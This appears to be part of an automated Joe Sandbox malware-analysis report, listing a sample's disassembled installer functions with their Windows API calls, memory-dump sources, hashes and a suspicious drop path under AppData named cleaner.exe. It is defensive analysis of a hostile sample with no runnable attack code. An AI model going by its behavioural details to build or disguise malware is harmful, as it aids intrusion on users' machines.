                                                                                                                                                                                                              Function 00402DF3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 00402E45
                                                                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                                                                                              • API String ID: 1451636040-1158693248
                                                                                                                                                                                                              • Opcode ID: 55259a99b3f005bd62bd1eee31106c216fd46ae3fbea56f5e47295bb88c76c71
                                                                                                                                                                                                              • Instruction ID: e56410310a72084f4d909e549713b6ef5e7faa8c618e51606751afd800fe69ca
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55259a99b3f005bd62bd1eee31106c216fd46ae3fbea56f5e47295bb88c76c71
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 28F0317064020CABDF206F60DD4EBEE3B69EB40319F00803AFA45B51D0DBF999598F99
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 004028AD Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2667972263-0
                                                                                                                                                                                                              • Opcode ID: 4dd5869cf8e01605dbba6f89003ab72911ed6556746709080781428bb81ff186
                                                                                                                                                                                                              • Instruction ID: cde632e975db2237da1c3b35629bcc1af8e7f74e244a4afe6fc019873d9bc44b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4dd5869cf8e01605dbba6f89003ab72911ed6556746709080781428bb81ff186
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D921BFB1C00124BBCF116FA5DE48D9E7E79EF09324F10023AF9647A2E1CB794D418B98
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00404C0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrlenW.KERNEL32(00446728,00446728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 00404CB6
                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00446728), ref: 00404CC9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                              • String ID: %u.%u%s%s$(gD
                                                                                                                                                                                                              • API String ID: 3540041739-492854681
                                                                                                                                                                                                              • Opcode ID: 3064c8308b7509d1383c21e902e6820dcf1316d1410b3bc833d73e44a854a58c
                                                                                                                                                                                                              • Instruction ID: aaf23b967d3fcc40b536a7be4f54997d0d4b2484921d6e850771612597014f60
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3064c8308b7509d1383c21e902e6820dcf1316d1410b3bc833d73e44a854a58c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D11EB73A0412837EB00556DAC45EDF3288EB85374F264237FA66F31D1E979CC5282E8
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 0040667C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,004D5000,004D5000,004C1000,00403480,004D5000,74DF3420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                                                                                                                              • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                                                                                                                              • CharNextW.USER32(?,00000000,004D5000,004D5000,004C1000,00403480,004D5000,74DF3420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                                                                                                                              • CharPrevW.USER32(?,?,004D5000,004D5000,004C1000,00403480,004D5000,74DF3420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Char$Next$Prev
                                                                                                                                                                                                              • String ID: *?|<>/":
                                                                                                                                                                                                              • API String ID: 589700163-165019052
                                                                                                                                                                                                              • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                                                                                                                              • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00401DB9 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDC.USER32(?), ref: 00401DBC
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                                                                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                                                                                                                              • CreateFontIndirectW.GDI32(0041E5D8), ref: 00401E3E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3808545654-0
                                                                                                                                                                                                              • Opcode ID: d45f834d171d725afd91ae9bb128b8c3c7dbb3b90b3bde5971021a52cdcc4ac4
                                                                                                                                                                                                              • Instruction ID: f94ea66f3bb0d18877d48f50851b2a4d43bd5926543aaa07d49364debbc8af75
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d45f834d171d725afd91ae9bb128b8c3c7dbb3b90b3bde5971021a52cdcc4ac4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A601B575A04240BFF7009BF5AE0A7D9BFB5AB55309F10847DF642B61E2D97840858F2D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                                                                                                                              • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                                                                                                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1849352358-0
                                                                                                                                                                                                              • Opcode ID: 82d477863e66f443ebd46b8e1e302b7a8e37783b84298c30bb4df0bf372e1380
                                                                                                                                                                                                              • Instruction ID: c4075bb9bfde8645d9c714665ee228779135434f852c8317c1fe236da41c92b1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 82d477863e66f443ebd46b8e1e302b7a8e37783b84298c30bb4df0bf372e1380
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0F0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D419B38
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$Timeout
                                                                                                                                                                                                              • String ID: !
                                                                                                                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                                                                                                                              • Opcode ID: 24084e1ee828c43313bede8142c405a0ca1b46cb638746800ee982a4d2c00c06
                                                                                                                                                                                                              • Instruction ID: 177e50295cc88f553b9a3067857c13a37c9039e473aa79b37457755941741264
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 24084e1ee828c43313bede8142c405a0ca1b46cb638746800ee982a4d2c00c06
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97219371948209AEEF05DFB5DE4AABE7BB5EF84304F14443EF605B61D0D7B889809B18
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Close$Enum
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 464197530-0
                                                                                                                                                                                                              • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                                                                                                                              • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 0040591F Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405962
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00405976
                                                                                                                                                                                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00405995
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3449924974-0
                                                                                                                                                                                                              • Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                                                                                                                              • Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 004053C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 004053F3
                                                                                                                                                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                                                                                                                                                                                • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                                                                                                                              • Opcode ID: 4753812dcda77c43f10e8ae772257530cbd3706fb24bd1d76dbcd04b27752b45
                                                                                                                                                                                                              • Instruction ID: 93d8fc7429a3309a4d5f32771a2db5550657aa0780c74b0d1fda1c3346d9b8f3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4753812dcda77c43f10e8ae772257530cbd3706fb24bd1d76dbcd04b27752b45
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A01BC71100709ABDB205F01ED80BDB3A26EB9135AF604037FA00762E0C37A8CD29E6E
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 004062B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00004000,00000002,0043E708,00000000,?,?,"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe",?,?,0040652A,80000002), ref: 004062FC
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,0040652A,80000002,Software\Microsoft\Windows\CurrentVersion,"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe","C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe","C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe",00000000,0043E708), ref: 00406307
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe", xrefs: 004062BD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseQueryValue
                                                                                                                                                                                                              • String ID: "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"
                                                                                                                                                                                                              • API String ID: 3356406503-1638566638
